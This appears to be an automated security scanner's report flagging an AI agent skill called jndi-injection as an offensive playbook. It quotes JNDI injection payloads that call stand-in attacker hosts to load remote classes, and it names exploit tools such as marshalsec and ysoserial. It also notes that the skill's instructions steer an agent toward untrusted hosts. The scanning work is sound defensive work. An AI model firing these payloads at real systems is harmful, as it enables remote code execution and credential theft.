jndi-injection

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This document is an explicit offensive playbook that instructs how to perform JNDI injection for remote code execution, run rogue RMI/LDAP servers, exfiltrate secrets (including environment variables and AWS keys), use deserialization gadget chains, and evade WAFs—i.e., it provides step‑by‑step malicious techniques and tooling for system compromise and credential theft.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The SKILL.md explicitly instructs creating and interpreting JNDI lookups to attacker-controlled public endpoints (e.g., ${jndi:ldap://ATTACKER:1389/Exploit}, ${jndi:dns://TOKEN.collab.net}) and using tools/servers (marshalsec, RogueJndi) so the agent is expected to ingest and act on untrusted third-party responses from open internet hosts, including DNS/LDAP/RMI payload results (see sections 3, 4, 5, and 7 of SKILL.md).

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill explicitly instructs runtime use of attacker-controlled lookups such as ldap://attacker.com:1389 and http://attacker.com/Exploit.class which cause a JVM to fetch remote class/serialized data and execute it, so external URLs are required at runtime and directly enable remote code execution.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt is an explicit offensive playbook that tells the agent to run exploit tooling and start LDAP/RMI/JRMP listeners and payloads (marshalsec, ysoserial, RogueJndi, etc.), which would execute code and change the agent host's state and enable remote code execution, so it should be flagged.